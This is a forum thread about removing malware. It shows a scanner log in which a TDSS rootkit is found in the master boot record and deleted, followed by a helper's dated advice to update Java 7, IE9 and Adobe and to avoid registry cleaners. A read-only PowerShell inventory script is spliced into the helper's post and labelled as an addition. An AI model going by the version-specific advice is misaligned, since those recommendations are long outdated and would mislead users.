13:29:56.0656 4240	viaagp (045d9961e591cf0674a920b6ba3ba5cb) C:\Windows\system32\drivers\viaagp.sys
13:29:56.0671 4240	viaagp - ok
13:29:56.0695 4240	ViaC7 (56a4de5f02f2e88182b0981119b4dd98) C:\Windows\system32\drivers\viac7.sys
13:29:56.0776 4240	ViaC7 - ok
13:29:56.0832 4240	viaide (fd2e3175fcada350c7ab4521dca187ec) C:\Windows\system32\drivers\viaide.sys
13:29:56.0846 4240	viaide - ok
13:29:56.0906 4240	volmgr (69503668ac66c77c6cd7af86fbdf8c43) C:\Windows\system32\drivers\volmgr.sys
13:29:56.0922 4240	volmgr - ok
13:29:57.0012 4240	volmgrx (23e41b834759917bfd6b9a0d625d0c28) C:\Windows\system32\drivers\volmgrx.sys
13:29:57.0034 4240	volmgrx - ok
13:29:57.0126 4240	volsnap (147281c01fcb1df9252de2a10d5e7093) C:\Windows\system32\drivers\volsnap.sys
13:29:57.0149 4240	volsnap - ok
13:29:57.0234 4240	vsmraid (d984439746d42b30fc65a4c3546c6829) C:\Windows\system32\drivers\vsmraid.sys
13:29:57.0250 4240	vsmraid - ok
13:29:57.0461 4240	VSS (db3d19f850c6eb32bdcb9bc0836acddb) C:\Windows\system32\vssvc.exe
13:29:57.0589 4240	VSS - ok
13:29:57.0651 4240	W32Time (96ea68b9eb310a69c25ebb0282b2b9de) C:\Windows\system32\w32time.dll
13:29:57.0694 4240	W32Time - ok
13:29:57.0830 4240	W3SVC (9ca92191c8f18e8b491a5b28e63c07b7) C:\Windows\system32\inetsrv\iisw3adm.dll
13:29:57.0951 4240	W3SVC - ok
13:29:58.0050 4240	WacomPen (48dfee8f1af7c8235d4e626f0c4fe031) C:\Windows\system32\drivers\wacompen.sys
13:29:58.0107 4240	WacomPen - ok
13:29:58.0198 4240	Wanarp (55201897378cca7af8b5efd874374a26) C:\Windows\system32\DRIVERS\wanarp.sys
13:29:58.0241 4240	Wanarp - ok
13:29:58.0246 4240	Wanarpv6 (55201897378cca7af8b5efd874374a26) C:\Windows\system32\DRIVERS\wanarp.sys
13:29:58.0275 4240	Wanarpv6 - ok
13:29:58.0287 4240	WAS (9ca92191c8f18e8b491a5b28e63c07b7) C:\Windows\system32\inetsrv\iisw3adm.dll
13:29:58.0311 4240	WAS - ok
13:29:58.0378 4240	wcncsvc (a3cd60fd826381b49f03832590e069af) C:\Windows\System32\wcncsvc.dll
13:29:58.0416 4240	wcncsvc - ok
13:29:58.0486 4240	WcsPlugInService (11bcb7afcdd7aadacb5746f544d3a9c7) C:\Windows\System32\WcsPlugInService.dll
13:29:58.0527 4240	WcsPlugInService - ok
13:29:58.0566 4240	Wd (afc5ad65b991c1e205cf25cfdbf7a6f4) C:\Windows\system32\drivers\wd.sys
13:29:58.0581 4240	Wd - ok
13:29:58.0665 4240	Wdf01000 (b6f0a7ad6d4bd325fbcd8bac96cd8d96) C:\Windows\system32\drivers\Wdf01000.sys
13:29:58.0694 4240	Wdf01000 - ok
13:29:58.0831 4240	WdiServiceHost (abfc76b48bb6c96e3338d8943c5d93b5) C:\Windows\system32\wdi.dll
13:29:58.0866 4240	WdiServiceHost - ok
13:29:58.0871 4240	WdiSystemHost (abfc76b48bb6c96e3338d8943c5d93b5) C:\Windows\system32\wdi.dll
13:29:58.0908 4240	WdiSystemHost - ok
13:29:58.0986 4240	WebClient (04c37d8107320312fbae09926103d5e2) C:\Windows\System32\webclnt.dll
13:29:59.0010 4240	WebClient - ok
13:29:59.0065 4240	Wecsvc (ae3736e7e8892241c23e4ebbb7453b60) C:\Windows\system32\wecsvc.dll
13:29:59.0090 4240	Wecsvc - ok
13:29:59.0147 4240	wercplsupport (670ff720071ed741206d69bd995ea453) C:\Windows\System32\wercplsupport.dll
13:29:59.0202 4240	wercplsupport - ok
13:29:59.0265 4240	WerSvc (32b88481d3b326da6deb07b1d03481e7) C:\Windows\System32\WerSvc.dll
13:29:59.0308 4240	WerSvc - ok
13:29:59.0476 4240	WinDefend (4575aa12561c5648483403541d0d7f2b) C:\Program Files\Windows Defender\mpsvc.dll
13:29:59.0500 4240	WinDefend - ok
13:29:59.0508 4240	WinHttpAutoProxySvc - ok
13:29:59.0619 4240	Winmgmt (6b2a1d0e80110e3d04e6863c6e62fd8a) C:\Windows\system32\wbem\WMIsvc.dll
13:29:59.0675 4240	Winmgmt - ok
13:29:59.0770 4240	WinRM (7cfe68bdc065e55aa5e8421607037511) C:\Windows\system32\WsmSvc.dll
13:29:59.0941 4240	WinRM - ok
13:30:00.0123 4240	Wlansvc (c008405e4feeb069e30da1d823910234) C:\Windows\System32\wlansvc.dll
13:30:00.0203 4240	Wlansvc - ok
13:30:00.0470 4240	wlidsvc (0a70f4022ec2e14c159efc4f69aa2477) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
13:30:00.0585 4240	wlidsvc - ok
13:30:00.0837 4240	WmiAcpi (701a9f884a294327e9141d73746ee279) C:\Windows\system32\drivers\wmiacpi.sys
13:30:00.0981 4240	WmiAcpi - ok
13:30:01.0153 4240	wmiApSrv (43be3875207dcb62a85c8c49970b66cc) C:\Windows\system32\wbem\WmiApSrv.exe
13:30:01.0187 4240	wmiApSrv - ok
13:30:01.0408 4240	WMPNetworkSvc (3978704576a121a9204f8cc49a301a9b) C:\Program Files\Windows Media Player\wmpnetwk.exe
13:30:01.0625 4240	WMPNetworkSvc - ok
13:30:01.0709 4240	WPCSvc (cfc5a04558f5070cee3e3a7809f3ff52) C:\Windows\System32\wpcsvc.dll
13:30:01.0789 4240	WPCSvc - ok
13:30:01.0836 4240	WPDBusEnum (801fbdb89d472b3c467eb112a0fc9246) C:\Windows\system32\wpdbusenum.dll
13:30:01.0889 4240	WPDBusEnum - ok
13:30:01.0993 4240	WpdUsb (de9d36f91a4df3d911626643debf11ea) C:\Windows\system32\DRIVERS\wpdusb.sys
13:30:02.0027 4240	WpdUsb - ok
13:30:02.0317 4240	WPFFontCache_v0400 (dcf3e3edf5109ee8bc02fe6e1f045795) C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\WPFFontCache_v0400.exe
13:30:02.0350 4240	WPFFontCache_v0400 - ok
13:30:02.0405 4240	ws2ifsl (e3a3cb253c0ec2494d4a61f5e43a389c) C:\Windows\system32\drivers\ws2ifsl.sys
13:30:02.0439 4240	ws2ifsl - ok
13:30:02.0503 4240	wscsvc (1ca6c40261ddc0425987980d0cd2aaab) C:\Windows\system32\wscsvc.dll
13:30:02.0545 4240	wscsvc - ok
13:30:02.0593 4240	WSDPrintDevice (4422ac5ed8d4c2f0db63e71d4c069dd7) C:\Windows\system32\DRIVERS\WSDPrint.sys
13:30:02.0618 4240	WSDPrintDevice - ok
13:30:02.0624 4240	WSearch - ok
13:30:02.0844 4240	wuauserv (6298277b73c77fa99106b271a7525163) C:\Windows\system32\wuaueng.dll
13:30:03.0087 4240	wuauserv - ok
13:30:03.0270 4240	WUDFRd (ac13cb789d93412106b0fb6c7eb2bcb6) C:\Windows\system32\DRIVERS\WUDFRd.sys
13:30:03.0303 4240	WUDFRd - ok
13:30:03.0364 4240	wudfsvc (575a4190d989f64732119e4114045a4f) C:\Windows\System32\WUDFSvc.dll
13:30:03.0421 4240	wudfsvc - ok
13:30:03.0524 4240	xnacc (9eea6d029fef5f3016d089b1a603837d) C:\Windows\system32\DRIVERS\xnacc.sys
13:30:03.0566 4240	xnacc - ok
13:30:03.0595 4240	MBR (0x1B8) (5b5e648d12fcadc244c1ec30318e1eb9) \Device\Harddisk0\DR0
13:30:04.0218 4240	\Device\Harddisk0\DR0 ( TDSS File System ) - warning
13:30:04.0218 4240	\Device\Harddisk0\DR0 - detected TDSS File System (1)
13:30:04.0224 4240	Boot (0x1200) (4c665477e7a79fdb1f3f319443854ef8) \Device\Harddisk0\DR0\Partition0
13:30:04.0226 4240	\Device\Harddisk0\DR0\Partition0 - ok
13:30:04.0227 4240	============================================================
13:30:04.0227 4240	Scan finished
13:30:04.0227 4240	============================================================
13:30:04.0242 3296	Detected object count: 14
13:30:04.0242 3296	Actual detected object count: 14
13:31:25.0577 3296	BVRPMPR5 ( UnsignedFile.Multi.Generic ) - skipped by user
13:31:25.0577 3296	BVRPMPR5 ( UnsignedFile.Multi.Generic ) - User select action: Skip 
13:31:25.0580 3296	IDriverT ( UnsignedFile.Multi.Generic ) - skipped by user
13:31:25.0580 3296	IDriverT ( UnsignedFile.Multi.Generic ) - User select action: Skip 
13:31:25.0584 3296	KR10I ( UnsignedFile.Multi.Generic ) - skipped by user
13:31:25.0584 3296	KR10I ( UnsignedFile.Multi.Generic ) - User select action: Skip 
13:31:25.0587 3296	KR10N ( UnsignedFile.Multi.Generic ) - skipped by user
13:31:25.0588 3296	KR10N ( UnsignedFile.Multi.Generic ) - User select action: Skip 
13:31:25.0590 3296	KR3NPXP ( UnsignedFile.Multi.Generic ) - skipped by user
13:31:25.0590 3296	KR3NPXP ( UnsignedFile.Multi.Generic ) - User select action: Skip 
13:31:25.0593 3296	NCHSSVAD ( UnsignedFile.Multi.Generic ) - skipped by user
13:31:25.0593 3296	NCHSSVAD ( UnsignedFile.Multi.Generic ) - User select action: Skip 
13:31:25.0596 3296	ServiceLayer ( UnsignedFile.Multi.Generic ) - skipped by user
13:31:25.0596 3296	ServiceLayer ( UnsignedFile.Multi.Generic ) - User select action: Skip 
13:31:25.0599 3296	sptd ( LockedFile.Multi.Generic ) - skipped by user
13:31:25.0599 3296	sptd ( LockedFile.Multi.Generic ) - User select action: Skip 
13:31:25.0600 3296	StarWindServiceAE ( UnsignedFile.Multi.Generic ) - skipped by user
13:31:25.0600 3296	StarWindServiceAE ( UnsignedFile.Multi.Generic ) - User select action: Skip 
13:31:25.0604 3296	TNaviSrv ( UnsignedFile.Multi.Generic ) - skipped by user
13:31:25.0604 3296	TNaviSrv ( UnsignedFile.Multi.Generic ) - User select action: Skip 
13:31:25.0607 3296	TODDSrv ( UnsignedFile.Multi.Generic ) - skipped by user
13:31:25.0607 3296	TODDSrv ( UnsignedFile.Multi.Generic ) - User select action: Skip 
13:31:25.0610 3296	UleadBurningHelper ( UnsignedFile.Multi.Generic ) - skipped by user
13:31:25.0610 3296	UleadBurningHelper ( UnsignedFile.Multi.Generic ) - User select action: Skip 
13:31:25.0613 3296	USBAAPL ( UnsignedFile.Multi.Generic ) - skipped by user
13:31:25.0613 3296	USBAAPL ( UnsignedFile.Multi.Generic ) - User select action: Skip 
13:31:25.0717 3296	\Device\Harddisk0\DR0\TDLFS\config.ini - copied to quarantine
13:31:25.0822 3296	\Device\Harddisk0\DR0\TDLFS\tdl - copied to quarantine
13:31:25.0830 3296	\Device\Harddisk0\DR0\TDLFS\rsrc.dat - copied to quarantine
13:31:25.0852 3296	\Device\Harddisk0\DR0\TDLFS\tdlcmd.dll - copied to quarantine
13:31:27.0200 3296	\Device\Harddisk0\DR0\TDLFS\data.db - copied to quarantine
13:31:27.0205 3296	\Device\Harddisk0\DR0\TDLFS\data.js - copied to quarantine
13:31:27.0215 3296	\Device\Harddisk0\DR0\TDLFS - deleted
13:31:27.0215 3296	\Device\Harddisk0\DR0 ( TDSS File System ) - User select action: Delete


----------



## gagraptor (May 23, 2012)

I had no problems uninstalling all the programs. I deleted some manually


----------



## Mark1956 (May 7, 2011)

Just a couple more things to do and we are finished.

*Adobe*
Close any programs you may have running - especially your web browser.
Click on Start > *Control Panel*, double-click on Programs and Features and remove *all* older versions of Adobe.
Then go to this link here and select the latest version to download and install. You will normally only need the downloads from one of the four "Readers and Players" in the top right hand corner of the page. Older versions of Adobe are vulnerable to infection so should always be uninstalled before installing the most up to date version available.

*Java*

*Important Note*: Your version of *Java is out of date.* *Older versions have vulnerabilities that malicious sites can use to exploit and infect your system*.

Microsoft: Unprecedented Wave of Java Exploitation
Drive-by Trojan preying on out-of-date Java installations 
Ghosts of Java Haunt Users
Please follow these steps to remove older version Java components and update:

Download the latest version of *Java Runtime Environment (JRE) Version 7* and save it to your desktop.
Look for "*Java Platform, Standard Edition*".
Click the "*Download JRE*" button to the right.
Read the License Agreement, and then check the box that says: "_Accept License Agreement_".
From the list, select your OS and Platform (32-bit or 64-bit).
If a download for an *Offline Installation* is available, it is recommended to choose that and save the file to your desktop.
Close any programs you may have running - especially your web browser.
Click on Start > Control Panel, double-click on Programs and Features and remove *all* older versions of Java.

Check (_highlight_) any item with Java Runtime Environment (JRE or J2SE) in the name.
Click the *Uninstall* button at the top of the window and follow the onscreen instructions for the Java uninstaller.
Repeat as many times as necessary to remove each Java version.
Reboot your computer once all Java components are removed.
Then from your desktop double-click on *jre-7u4-windows-i586.exe* (or jre-7u4-windows-x64.exe for 64-bit) to install the newest version.
If the uninstaller refuses to launch due to insufficient user permissions, then Run As Administrator.
When the _Java Setup - Welcome_ window opens, click the *Install* button.
If offered to install a Toolbar, just *uncheck* the box before continuing unless you want it.
The McAfee Security Scan Plus tool is _installed by default_ unless you *uncheck* the McAfee installation box when updating Java.
_-- Java is updated frequently. If you want to be automatically notified of future updates, just turn on the Java Automatic Update feature and you will not have to remember to update when Java releases a new version._
*Note:* The *Java Quick Starter (JQS.exe)* adds a service to improve the initial startup time of Java applets and applications but it's not necessary.

To *disable the JQS service* if you don't want to use it:

Go to Start > Control Panel > Java > Advanced > Miscellaneous and *uncheck* the box for *Java Quick Starter*.
Click Ok and reboot your computer.
_____________________________________________________________________________
*Internet Explorer*
Your Internet Explorer is out of date. The latest version for Windows 7/Vista has a better level of security, which helps to stop malicious software from reaching your PC. Please follow the instructions to install IE9 from here: Install/Uninstall Internet Explorer 9
_____________________________________________________________________________
*Firefox*
Your version of Firefox is out of date. Please go here for instructions to update to the latest version:
How to Update Firefox
_____________________________________________________________________________
*IMPORTANT NOTE*: Your log shows you are using a registry cleaner/optimizer, CCleaner. Although CCleaner is a useful tool, please read this in respect of its *Registry Cleaning* function.
We *do not* recommend the routine use of registry cleaners/optimizers for several reasons:
• *Registry cleaners are extremely powerful applications that can damage the registry by using aggressive cleaning routines and cause your computer to become unbootable.*

The Windows registry is a central repository (database) for storing configuration data, user settings and machine-dependent settings, and options for the operating system. It contains information and settings for all hardware, software, users, and preferences. Whenever a user makes changes to settings, file associations, system policies, or installed software, the changes are reflected and stored in this repository. The *registry is a crucial component *because it is where Windows _"remembers"_ all this information, how it works together, how Windows boots the system and what files it uses when it does. The registry is also a vulnerable subsystem, in that relatively *small changes done incorrectly can render the system inoperable*. For a more detailed explanation, read Understanding The Registry

• *Not all registry cleaners are created equal*. There are a number of them available but they do not all work entirely the same way. Each vendor uses different criteria as to what constitutes a "bad entry". One cleaner may find entries on your system that will not cause problems when removed, another may not find the same entries, and still another may want to remove entries required for a program to work. Further, some vendors who offer registry cleaners use deceptive advertisements and claims which are borderline *scams*. They may alert you to finding thousands of registry errors which can only be fixed and improve performance if you use their product.

• *Not all registry cleaners create a backup of the registry before making changes.* If the changes prevent the system from booting up, then there is no backup available to restore it in order to regain functionality. A backup of the registry is essential *BEFORE* making any changes to the registry.

• *Improperly removing registry entries can hamper malware disinfection* and make the removal process more difficult if your computer becomes infected. For example, removing malware related registry entries before the infection is properly identified can contribute to system instability and even make the malware undetectable to removal tools.

• *The usefulness of cleaning the registry is highly overrated and can be dangerous.* In most cases, using a cleaner to remove obsolete, invalid, and erroneous entries does not affect system performance but it can result in "unpredictable results". 
Unless you have a particular problem that requires a specific registry edit to correct it, I would suggest you leave the registry alone. Using registry cleaning tools *unnecessarily* or *incorrectly* could lead to *disastrous effects on your operating system such as preventing it from ever starting again.* *For routine use, the benefits to your computer are negligible while the potential risks are great.*
If you are still not convinced then please read the information in these following links.

• Ed Bott's Weblog: Why I don't use registry cleaners
• Do I need a Registry Cleaner?
• Registry Cleaners and System Tweaking Tools
_____________________________________________________________________________
*Some additional security measures.*
If your present security software does not include a third party Firewall or AntiSpyware:
Go Here for a selection of third party Firewalls.
Go Here or Here for Anti Spyware.

*Always keep your Java, Adobe and Flash Player up to date.*
Why you should update Java
Why you should update Adobe
Why you should update Flash Player

Malwarebytes free version (which you may have used during this thread) is worth having for regular scans of your system, always check for updates before using it. If you can afford the Malwarebytes Pro version it will provide even better protection with a full time active scanner. Never have more than one active anti virus, anti spyware or firewall running on your system as it can cause conflicts and slow down the PC. You can safely run the Pro version of *Malwarebytes* with any Anti Virus software.

WOT (Web of Trust) will warn you (in most cases) about dangerous web sites.

Secunia PSI is a FREE security tool designed to detect vulnerable and outdated programs and plug-ins which expose your PC to attacks. Attacks exploiting vulnerable programs and plug-ins are rarely blocked by traditional anti-virus and are therefore increasingly "popular" among criminals.

WinPatrol is a useful facility to have. *WinPatrol* takes snapshots of your critical system resources and alerts you to any changes that may occur without your knowledge. It can also be used to control all your *start up* programs.
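The Adobe and Java steps in the post above are done by hand in Programs and Features, where the user has to pick out every old Java Runtime Environment (JRE or J2SE) entry by eye. As an added example that is not part of Mark1956's post or of any tool it mentions, the PowerShell script below reads the same Uninstall registry keys that Programs and Features is built from and lists every Java, Adobe Reader and Flash Player entry with its version, then flags product families that have more than one version installed side by side, which is exactly the condition the post asks you to clear before installing the current release. The function names `Get-ProductFamily` and `Get-PluginInventory` are my own; the registry paths are the standard Windows Uninstall keys. The script is read-only and removes nothing.

```powershell
# Added example, not from the original thread: inventory the Java, Adobe Reader
# and Flash Player entries that Programs and Features would show, so old versions
# can be identified before they are uninstalled. Read-only: nothing is changed.

function Get-ProductFamily {
    # Collapse a DisplayName such as "Java(TM) 6 Update 31" or
    # "Adobe Reader X (10.1.3)" into a coarse product family.
    param([string]$Name)
    switch -Regex ($Name) {
        'Java|J2SE|JRE'               { return 'Java' }
        'Adobe Reader|Acrobat Reader' { return 'Adobe Reader' }
        'Flash Player'                { return 'Flash Player' }
        default                       { return $Name }
    }
}

function Get-PluginInventory {
    # Uninstall keys for per-machine installs (64- and 32-bit views) and
    # per-user installs. The WOW6432Node path does not exist on 32-bit
    # Windows, so missing keys are silently skipped.
    $uninstallKeys = @(
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*',
        'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*',
        'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*'
    )
    # Products the post says must always be kept current (match is case-insensitive)
    $patterns = 'Java|J2SE|JRE|Adobe Reader|Acrobat Reader|Flash Player'

    Get-ItemProperty -Path $uninstallKeys -ErrorAction SilentlyContinue |
        Where-Object {
            $_.DisplayName -and
            $_.DisplayName -match $patterns -and
            $_.DisplayName -notmatch 'Auto Updater'   # helper entry, not a runtime
        } |
        ForEach-Object {
            New-Object PSObject -Property @{
                Family          = Get-ProductFamily $_.DisplayName
                DisplayName     = $_.DisplayName
                Version         = $_.DisplayVersion
                Publisher       = $_.Publisher
                InstallDate     = $_.InstallDate
                # The command Programs and Features runs for this entry
                UninstallString = $_.UninstallString
            }
        } |
        Sort-Object Family, DisplayName, Version
}

$inventory = Get-PluginInventory
$inventory | Format-Table Family, DisplayName, Version, Publisher, InstallDate -AutoSize

# Families with more than one distinct version installed: the post asks for all
# older versions to be removed before the current release goes on.
$inventory |
    Group-Object -Property Family |
    ForEach-Object {
        $versions = $_.Group | ForEach-Object { $_.Version } | Sort-Object -Unique
        if (@($versions).Count -gt 1) {
            "Multiple versions of $($_.Name) installed: $($versions -join ', ')"
        }
    }

# Show which uninstall command belongs to which entry, so the manual removal
# step in Programs and Features can be matched to the right version.
$inventory | ForEach-Object {
    "{0} {1} -> {2}" -f $_.DisplayName, $_.Version, $_.UninstallString
}
```

Run it from a PowerShell prompt before and after working through the uninstall steps: before, the "Multiple versions" line tells you how many entries to remove; afterwards the inventory should show a single current version per family. Flash Player legitimately installs separate ActiveX and plug-in entries, which is why the check compares distinct version strings rather than counting entries.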


----------



## Mark1956 (May 7, 2011)

As long as you have no further issues, please mark the thread as Solved by clicking on the *"Mark Solved"* button.


----------

